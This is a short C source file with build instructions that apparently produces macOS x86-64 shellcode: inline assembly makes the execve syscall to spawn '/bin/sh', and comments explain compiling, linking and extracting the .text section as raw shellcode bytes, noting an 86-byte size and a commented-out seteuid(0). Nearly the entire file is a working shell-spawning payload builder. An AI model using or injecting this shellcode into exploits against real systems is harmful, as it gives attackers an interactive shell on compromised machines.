//#include <sys/syscall.h>

/*

1) compile code:

/usr/local/Cellar/gcc/6.3.0_1/bin/gcc-6 -c test.c --shared -fpic -static -O0 -fno-asynchronous-unwind-tables -D LIB

or for byte savings: (86 bytes)

/usr/local/Cellar/gcc/6.3.0_1/bin/gcc-6 -c test.c --shared -fpic -static -O3 -fno-asynchronous-unwind-tables -D LIB

2) link your code:

ld test.o -o test -S -static -dylib -order_file system-execve-order-file.txt

2) get hex of shel code of section:

gobjcopy -O binary --only-section=.text test test.output

*/

// int main1();

// int myexec(char* arg1, long arg2, long arg3);

static volatile int myexec(char * arg1, long arg2, long arg3) {

/*

asm ( assembler template

: output operands

: input operands

: list of clobbered registers

);

// */

// int a=10, b;

// asm ("movl %1, %%eax;

// movl %%eax, %0;"

// :"=r"(b) /* output */

// :"r"(a) /* input */

// :"%eax" /* clobbered register */

// );

volatile int x = 0;

int y = 0x200003b;

asm volatile( "movq %4,%%rax;\n\t"

"movq %1,%%rdi;\n\t"

"mov %2,%%rsi;\n\t"

"mov %3,%%rdx;\n\t"

"syscall"

:"=g"(x)

:"g"(arg1),"g"(arg2),"g"(arg3),"g"(y)

:"%rcx", "%r11", "%rax", "%rdi", "%rsi", "%rdx"

);

return x;

}

int main1() {

char mystring[] = {'/','b','i','n','/','s','h',0};

//seteuid(0);

//fork();

// char* command="/bin/sh"

myexec(mystring, 0, 0);

return 0;

}